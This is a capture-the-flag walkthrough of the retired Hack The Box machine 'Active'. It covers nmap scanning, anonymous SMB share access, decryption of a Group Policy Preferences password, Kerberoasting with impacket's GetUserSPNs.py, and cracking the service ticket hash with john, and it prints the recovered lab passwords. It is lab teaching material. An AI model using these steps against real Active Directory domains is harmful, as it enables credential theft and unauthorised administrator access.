HTB — Active

3 min readSep 30, 2019

Machine IP- 10.10.10.100

Nmap

PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019–09–20 10:29:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/20%OT=88%CT=1%CU=38163%PV=Y%DS=2%DC=T%G=Y%TM=5D84AAE
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M5
OS:4DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)Uptime guess: 0.020 days (since Fri Sep 20 15:35:10 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Here have to do host enumeration because we are not having any HTTP port form where we can gather information , so let’s start enumerating with SMBCLIENT (port 139)

smbclient -L 10.10.10.100

Here we get to see some share now let’s move in to get some information in Users share as it allows anonymous login

smb: \active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\machine\Preferences\Groups\Groups.xmlHere this Group.xml is having some information which can help us getting in

In Groups.xml we found hashes for user “SVC_TGS” cracked hashes with the help of gpp-decrypt

Here we got out password and now we are going find a way to move in with smbclient using the password and the user SVC_TGS

smbclient \\\\10.10.10.100\\Users -U SVC_TGSAnd enter the password we got from gpp-decrypt

And here we got out user.txt

let’s enumurate further for getting root user , at nmap we see that kpasswd5 port to be open which seems to be very unique , after searching about this service while searching i get to see that it’s a type of encryption and we can gain the hashes with the help of “GetUserSPNs.py” tool having Kerberoasting method used to steal service account credentials

python /usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 ACTIVE.HTB/SVC_TGSAnd enter the password "GPPstillStandingStrong2k18"

Here we got the administrator hash

Here Kerberos uses “krb5tgs” encryption , so decrypting it with john

First copy the hash in a text file — (admin-hash)
Use john to decrypt { john admin-hash — format=krb5tgs — wordlist=/usr/share/wordlists/rockyou.txt }
And found the password as “Ticketmaster1968”
Let’s connect to smb users share with administrator creds